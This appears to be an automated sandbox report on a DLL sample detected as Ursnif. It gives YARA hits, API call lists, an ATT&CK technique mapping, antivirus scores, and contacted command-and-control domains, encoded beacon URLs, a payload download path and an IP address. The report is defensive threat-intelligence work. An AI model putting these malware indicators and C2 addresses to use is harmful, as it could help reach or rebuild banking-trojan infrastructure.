Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6D8E1000 GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,

1_2_6D8E1000

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6D8E166F CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

1_2_6D8E166F

Source: C:\Windows\System32\Speech_OneCore\common\SpeechRuntime.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.466452806.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.466569570.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.476403108.0000000003C0B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.466493019.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.466366881.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.466524516.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.466612626.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.466599382.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.466417450.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7048, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6720, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.466452806.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.466569570.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.476403108.0000000003C0B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.466493019.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.466366881.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.466524516.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.466612626.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.466599382.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.466417450.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7048, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6720, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation2	Path Interception	Process Injection412	Rootkit4	Credential API Hooking3	System Time Discovery1	Remote Services	Email Collection1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Command and Scripting Interpreter1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Masquerading1	LSASS Memory	Security Software Discovery31	Remote Desktop Protocol	Credential API Hooking3	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	PowerShell1	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion3	Security Account Manager	Virtualization/Sandbox Evasion3	SMB/Windows Admin Shares	Archive Collected Data1	Automated Exfiltration	Non-Application Layer Protocol4	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection412	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol4	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information1	LSA Secrets	Application Window Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Rundll321	Cached Domain Credentials	Remote System Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	File and Directory Discovery2	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery45	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll	6%	Virustotal		Browse
SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll	9%	ReversingLabs	Win32.Trojan.Wacatac

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
c56.lepini.at	8%	Virustotal		Browse
api3.lepini.at	11%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://api10.laptok.at/api1/1Pg3i0gSwH/_2BK37nF8HXWhrouM/t7ZtEKshXTnV/JlSrHeYCtLF/7DzeevtXCQ9YRw/K2S	0%	Avira URL Cloud	safe
http://api3.lepini.at/api1/y_2FMOeWpuzZk/_2BnXUq3/JVsuHPZPWAuyAx51lbHW1TL/IXSkSA4WVL/DAqpD_2FBMpJwncEg/rZCSM_2By6jC/ilwbgSYz7wD/mcGv71FzhjZLjk/T5o_2Bi_2BnHa_2FHus_2/FtPTy54kQsAO5_2F/YmY57BYO_2F3DGr/PGRRj0Jrbr_2FcDWwI/cfiYP4Yvr/dFVw_2BRaTzNAlHYP_2B/F4QkcLzCJs_2FLyJ_2B/cMYZQA7iSlD9E2ry5mxVYa/rzbbsgjyGZ2a_/2Fo1e83a/dC9sn5XgEM_2FJ7rr6KTfxU/jopGSNBS_2/BO60ALGRt2Y_2Bxa9/6M_2Bh2kKvyG/E_2FWuogkAX/tPVHUrOPK7/MSerDY8wu/3	0%	Avira URL Cloud	safe
http://constitution.org/usdeclar.txt	0%	Avira URL Cloud	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://api3.lepini.at/api1/QPXSdTpsTN/HmJ5aoUnf9rdkbxHL/55q96h_2FAWR/k9PcTeP3anx/njZx9Znect4yPc/mgdKs7g4jsgOtOBfxx1F8/dzjzqrTWiA9S1bt6/AAS87muT_2BSLDv/WQXbadF0d6swuwTHJY/KpV8Mcid0/fHtmjyLYo7_2F_2FC9mX/FlMafGrpg0QISkwj5AA/Bx9kwrN4mx4ScQVnt0eLjW/cqdTbOZIYSnXb/FOL19o_2/BXbibnK12KkZbqaHWamy8is/edmHREWEDn/WS6dZgPXk2heo8Q98/fno8e4WQ55cB/UHS6HXS3QGn/yz08vW6xSGc_2B/3HnBpBPOsyIhF/0kjBdKE	0%	Avira URL Cloud	safe
http://api10.laptok.at/api1/AOpX_2BLE_2B_2B/x33_2BOxagWAsMnrX_/2B_2BU6zh/wlNMMjJfhf4dJdxy0gqf/YX9lknlxGzswe1f42DY/0ZRJKHiwVKqzREh7F1zZfC/xDcrm70JTSUqg/KfoZXHqy/gtcnRpNm54H7DKUH3incyf7/pb15dMsyWG/BetCueYOwQDaUpKex/cvRYM5W54J_2/F_2BvDZYdxx/C0N9hknbzclgNA/1DbqE0vpldFICv5iJdPAy/ml70ZyZiOpRDJ78b/h5qzpBVY36LCiZe/ZMZBhSfYbmpSZEV5ew/ylnSPhfpP/ctfktke6drAYijwp6R_2/Bn8ddXU	0%	Avira URL Cloud	safe
http://api10.laptok.at/api1/1Pg3i0gSwH/_2BK37nF8HXWhrouM/t7ZtEKshXTnV/JlSrHeYCtLF/7DzeevtXCQ9YRw/K2S8BQMDt78kCRWVvFKTW/T3z7jl77vtn31nAs/fsEjsZ1w6_2BM0e/_2B_2BAVLSWZlML2mx/fdFEX0w2l/0RPfFIvYjfZTYoK47bE8/B49X4mtNiudogIoMpOJ/IxyYMxMKBO_2F3ZR_2BAor/8kAylO6X_2Fiq/EdNEwQOa/FYHDMjDZgQLZqSkWO3yLWuc/j3i_2F5QMC/DRHsxypVX90thJgYh/6MpfO8pdNUGy/KOAPjs479Yf/dCe7rPiQO_2FVf/cp_2BP6SlyfefKqn_2BbT/iqLzQdVK/s	0%	Avira URL Cloud	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
http://constitution.org/usdeclar.txtC:	0%	Avira URL Cloud	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://c56.lepini.at/jvassets/xI/t64.dat	100%	Avira URL Cloud	phishing
http://api3.lepini.at/api1/6znaROjfA7hFvImt7kRBj/d8oBlDeaiTpDTw3m/IBQAbTPMeELrV0F/eBc8XtKIPlaG2wOk3_/2FzWsO07N/QVPbwJwjwuG0x_2Bmgtb/T2QshS_2F9rl28gdKaK/ObX5241N6Yuhqoe_2Bb_2F/v7SApCdjSpVoH/vIUqUnsJ/WVeez27cvHmK85aDLttDAUk/ChK5ibvdbq/6hwDFc02b_2F096iz/u_2BBs0hOK08/GFHq_2B8sNe/xc8KOXJRGK_2BT/23ua6L_2BsKd5NwAEGyWZ/BrR5nO2eoCoLivkJ/HCF96ydzEoPKQbD/PpBNddo_2FoZtXcrSVB6/q	0%	Avira URL Cloud	safe
http://api10.laptok.at/api1/fXWtKegXNhimfshJm11/ybi6PbAu_2FzbCxUMkXaR0/07xh_2FjserNk/Akz7MnFa/i	0%	Avira URL Cloud	safe
http://https://file://USER.ID%lu.exe/upd	0%	Avira URL Cloud	safe
http://api10.laptok.at/favicon.ico	0%	Avira URL Cloud	safe
http://api10.laptok.at/api1/fXWtKegXNhimfshJm11/ybi6PbAu_2FzbCxUMkXaR0/07xh_2FjserNk/Akz7MnFa/ilUyiG	0%	Avira URL Cloud	safe
http://api10.laptok.at/api1/AOpX_2BLE_2B_2B/x33_2BOxagWAsMnrX_/2B_2BU6zh/wlNMMjJfhf4dJdxy0gqf/YX9lkn	0%	Avira URL Cloud	safe
https://toldsend.com4	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
c56.lepini.at	35.228.31.40	true	true	8%, Virustotal, Browse	unknown
resolver1.opendns.com	208.67.222.222	true	false		high
api3.lepini.at	35.228.31.40	true	false	11%, Virustotal, Browse	unknown
api10.laptok.at	35.228.31.40	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://api3.lepini.at/api1/y_2FMOeWpuzZk/_2BnXUq3/JVsuHPZPWAuyAx51lbHW1TL/IXSkSA4WVL/DAqpD_2FBMpJwncEg/rZCSM_2By6jC/ilwbgSYz7wD/mcGv71FzhjZLjk/T5o_2Bi_2BnHa_2FHus_2/FtPTy54kQsAO5_2F/YmY57BYO_2F3DGr/PGRRj0Jrbr_2FcDWwI/cfiYP4Yvr/dFVw_2BRaTzNAlHYP_2B/F4QkcLzCJs_2FLyJ_2B/cMYZQA7iSlD9E2ry5mxVYa/rzbbsgjyGZ2a_/2Fo1e83a/dC9sn5XgEM_2FJ7rr6KTfxU/jopGSNBS_2/BO60ALGRt2Y_2Bxa9/6M_2Bh2kKvyG/E_2FWuogkAX/tPVHUrOPK7/MSerDY8wu/3	false	Avira URL Cloud: safe	unknown
http://api3.lepini.at/api1/QPXSdTpsTN/HmJ5aoUnf9rdkbxHL/55q96h_2FAWR/k9PcTeP3anx/njZx9Znect4yPc/mgdKs7g4jsgOtOBfxx1F8/dzjzqrTWiA9S1bt6/AAS87muT_2BSLDv/WQXbadF0d6swuwTHJY/KpV8Mcid0/fHtmjyLYo7_2F_2FC9mX/FlMafGrpg0QISkwj5AA/Bx9kwrN4mx4ScQVnt0eLjW/cqdTbOZIYSnXb/FOL19o_2/BXbibnK12KkZbqaHWamy8is/edmHREWEDn/WS6dZgPXk2heo8Q98/fno8e4WQ55cB/UHS6HXS3QGn/yz08vW6xSGc_2B/3HnBpBPOsyIhF/0kjBdKE	false	Avira URL Cloud: safe	unknown
http://api10.laptok.at/api1/AOpX_2BLE_2B_2B/x33_2BOxagWAsMnrX_/2B_2BU6zh/wlNMMjJfhf4dJdxy0gqf/YX9lknlxGzswe1f42DY/0ZRJKHiwVKqzREh7F1zZfC/xDcrm70JTSUqg/KfoZXHqy/gtcnRpNm54H7DKUH3incyf7/pb15dMsyWG/BetCueYOwQDaUpKex/cvRYM5W54J_2/F_2BvDZYdxx/C0N9hknbzclgNA/1DbqE0vpldFICv5iJdPAy/ml70ZyZiOpRDJ78b/h5qzpBVY36LCiZe/ZMZBhSfYbmpSZEV5ew/ylnSPhfpP/ctfktke6drAYijwp6R_2/Bn8ddXU	false	Avira URL Cloud: safe	unknown
http://api10.laptok.at/api1/1Pg3i0gSwH/_2BK37nF8HXWhrouM/t7ZtEKshXTnV/JlSrHeYCtLF/7DzeevtXCQ9YRw/K2S8BQMDt78kCRWVvFKTW/T3z7jl77vtn31nAs/fsEjsZ1w6_2BM0e/_2B_2BAVLSWZlML2mx/fdFEX0w2l/0RPfFIvYjfZTYoK47bE8/B49X4mtNiudogIoMpOJ/IxyYMxMKBO_2F3ZR_2BAor/8kAylO6X_2Fiq/EdNEwQOa/FYHDMjDZgQLZqSkWO3yLWuc/j3i_2F5QMC/DRHsxypVX90thJgYh/6MpfO8pdNUGy/KOAPjs479Yf/dCe7rPiQO_2FVf/cp_2BP6SlyfefKqn_2BbT/iqLzQdVK/s	false	Avira URL Cloud: safe	unknown
http://c56.lepini.at/jvassets/xI/t64.dat	true	Avira URL Cloud: phishing	unknown
http://api3.lepini.at/api1/6znaROjfA7hFvImt7kRBj/d8oBlDeaiTpDTw3m/IBQAbTPMeELrV0F/eBc8XtKIPlaG2wOk3_/2FzWsO07N/QVPbwJwjwuG0x_2Bmgtb/T2QshS_2F9rl28gdKaK/ObX5241N6Yuhqoe_2Bb_2F/v7SApCdjSpVoH/vIUqUnsJ/WVeez27cvHmK85aDLttDAUk/ChK5ibvdbq/6hwDFc02b_2F096iz/u_2BBs0hOK08/GFHq_2B8sNe/xc8KOXJRGK_2BT/23ua6L_2BsKd5NwAEGyWZ/BrR5nO2eoCoLivkJ/HCF96ydzEoPKQbD/PpBNddo_2FoZtXcrSVB6/q	false	Avira URL Cloud: safe	unknown
http://api10.laptok.at/favicon.ico	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://api10.laptok.at/api1/1Pg3i0gSwH/_2BK37nF8HXWhrouM/t7ZtEKshXTnV/JlSrHeYCtLF/7DzeevtXCQ9YRw/K2S	{E1BA15B4-6BF5-11EB-90E6-ECF4BB82F7E0}.dat.32.dr	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000027.00000002.575396484.000001E06BFD5000.00000004.00000001.sdmp	false		high
http://constitution.org/usdeclar.txt	powershell.exe, 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000027.00000002.531049628.000001E05C17E000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000027.00000002.531049628.000001E05C17E000.00000004.00000001.sdmp	false		high
https://contoso.com/	powershell.exe, 00000027.00000002.575396484.000001E06BFD5000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000027.00000002.575396484.000001E06BFD5000.00000004.00000001.sdmp	false		high
http://constitution.org/usdeclar.txtC:	powershell.exe, 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000027.00000002.575396484.000001E06BFD5000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000027.00000002.575396484.000001E06BFD5000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://api10.laptok.at/api1/fXWtKegXNhimfshJm11/ybi6PbAu_2FzbCxUMkXaR0/07xh_2FjserNk/Akz7MnFa/i	loaddll32.exe, 00000001.00000002.630147501.00000000019D0000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://https://file://USER.ID%lu.exe/upd	powershell.exe, 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://api10.laptok.at/api1/fXWtKegXNhimfshJm11/ybi6PbAu_2FzbCxUMkXaR0/07xh_2FjserNk/Akz7MnFa/ilUyiG	{E1BA15B6-6BF5-11EB-90E6-ECF4BB82F7E0}.dat.32.dr	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000027.00000002.530089766.000001E05BF71000.00000004.00000001.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000027.00000002.531049628.000001E05C17E000.00000004.00000001.sdmp	false		high
http://api10.laptok.at/api1/AOpX_2BLE_2B_2B/x33_2BOxagWAsMnrX_/2B_2BU6zh/wlNMMjJfhf4dJdxy0gqf/YX9lkn	{E1BA15B2-6BF5-11EB-90E6-ECF4BB82F7E0}.dat.32.dr	false	Avira URL Cloud: safe	unknown
https://toldsend.com4	loaddll32.exe, 00000001.00000002.638274435.000000006D969000.00000002.00020000.sdmp, SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
35.228.31.40	unknown	United States		15169	GOOGLEUS	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	351337
Start date:	10.02.2021
Start time:	15:13:01
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 16s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.19261 (renamed file extension from 19261 to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winDLL@18/24@11/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 4.4% (good quality ratio 4.1%) Quality average: 79.4% Quality standard deviation: 27.9%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, dllhost.exe, backgroundTaskHost.exe, ApplicationFrameHost.exe, SystemSettings.exe, audiodg.exe, BackgroundTransferHost.exe, ielowutil.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 104.42.151.234, 13.64.90.137, 104.43.193.48, 184.30.20.56, 52.255.188.83, 51.104.144.132, 92.122.213.194, 92.122.213.247, 8.253.204.120, 8.248.139.254, 67.27.158.254, 67.26.83.254, 67.27.157.126, 2.20.142.210, 2.20.142.209, 51.103.5.159, 51.104.136.2, 152.199.19.161, 40.127.240.158, 52.155.217.156, 20.54.26.129, 88.221.62.148 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, onecs-live.ec.azureedge.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, wns.notify.windows.com.akadns.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, go.microsoft.com, emea1.wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, ie9comview.vo.msecnd.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, onecs-live.azureedge.net, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, skypedataprdcolwus16.cloudapp.net, cs9.wpc.v0cdn.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
15:15:10	API Interceptor	2x Sleep call for process: SpeechRuntime.exe modified
15:15:58	API Interceptor	39x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
35.228.31.40	Attached_File_898318.xlsb	Get hash	malicious	Browse	api10.laptok.at/favicon.ico

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
resolver1.opendns.com	yytr.dll	Get hash	malicious	Browse	208.67.222.222
	xls.xls	Get hash	malicious	Browse	208.67.222.222
	Presentation_68192.xlsb	Get hash	malicious	Browse	208.67.222.222
	sup11_dump.dll	Get hash	malicious	Browse	208.67.222.222
	out.dll	Get hash	malicious	Browse	208.67.222.222
	crypt_3300.dll	Get hash	malicious	Browse	208.67.222.222
	SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll	Get hash	malicious	Browse	208.67.222.222
	6007d134e83fctar.dll	Get hash	malicious	Browse	208.67.222.222
	J5cB3wfXIZ.dll	Get hash	malicious	Browse	208.67.222.222
	6006bde674be5pdf.dll	Get hash	malicious	Browse	208.67.222.222
	mal.dll	Get hash	malicious	Browse	208.67.222.222
	fo.dll	Get hash	malicious	Browse	208.67.222.222
	5fd9d7ec9e7aetar.dll	Get hash	malicious	Browse	208.67.222.222
	5fd885c499439tar.dll	Get hash	malicious	Browse	208.67.222.222
	5fc612703f844.dll	Get hash	malicious	Browse	208.67.222.222
	https___purefile24.top_4352wedfoifom.dll	Get hash	malicious	Browse	208.67.222.222
	vnaSKDMnLG.dll	Get hash	malicious	Browse	208.67.222.222
	0xyZ4rY0opA2.vbs	Get hash	malicious	Browse	208.67.222.222
	6Xt3u55v5dAj.vbs	Get hash	malicious	Browse	208.67.222.222
	5fbce6bbc8cc4png.dll	Get hash	malicious	Browse	208.67.222.222
c56.lepini.at	Presentation_68192.xlsb	Get hash	malicious	Browse	47.89.250.152
	sup11_dump.dll	Get hash	malicious	Browse	45.138.24.6
	out.dll	Get hash	malicious	Browse	45.138.24.6
	crypt_3300.dll	Get hash	malicious	Browse	45.138.24.6
	SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll	Get hash	malicious	Browse	45.138.24.6
	u.dll	Get hash	malicious	Browse	46.173.218.93
	fo.dll	Get hash	malicious	Browse	46.173.218.93
	onerous.tar.dll	Get hash	malicious	Browse	47.241.19.44
	0xyZ4rY0opA2.vbs	Get hash	malicious	Browse	47.241.19.44
	6Xt3u55v5dAj.vbs	Get hash	malicious	Browse	47.241.19.44
	JeSoTz0An7tn.vbs	Get hash	malicious	Browse	47.241.19.44
	1qdMIsgkbwxA.vbs	Get hash	malicious	Browse	47.241.19.44
	2Q4tLHa5wbO1.vbs	Get hash	malicious	Browse	47.241.19.44
	0wDeH3QW0mRu.vbs	Get hash	malicious	Browse	47.241.19.44
	0k4Vu1eOEIhU.vbs	Get hash	malicious	Browse	47.241.19.44
	earmarkavchd.dll	Get hash	malicious	Browse	47.241.19.44
	6znkPyTAVN7V.vbs	Get hash	malicious	Browse	47.241.19.44
	a7APrVP2o2vA.vbs	Get hash	malicious	Browse	47.241.19.44
	03QKtPTOQpA1.vbs	Get hash	malicious	Browse	47.241.19.44
	2200.dll	Get hash	malicious	Browse	47.241.19.44

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
GOOGLEUS	zQDTleF1Sc.apk	Get hash	malicious	Browse	172.217.20.227
	fuS9xa8nq6.exe	Get hash	malicious	Browse	34.98.99.30
	Q6h03zxheA.exe	Get hash	malicious	Browse	34.102.136.180
	Efo7RLFvtt.exe	Get hash	malicious	Browse	216.239.32.21
	NNFYMCVABc.exe	Get hash	malicious	Browse	34.102.136.180
	AANK5mcsUZ.exe	Get hash	malicious	Browse	34.102.136.180
	30 percento,pdf.exe	Get hash	malicious	Browse	34.102.136.180
	akrien.exe	Get hash	malicious	Browse	8.8.8.8
	NdxPGuzTB9.exe	Get hash	malicious	Browse	34.102.136.180
	Comuinicado-Covid19-Min-Saude-VRC-03-02-21-210.vbs	Get hash	malicious	Browse	172.217.168.48
	PvvkzXgMjG.exe	Get hash	malicious	Browse	34.102.136.180
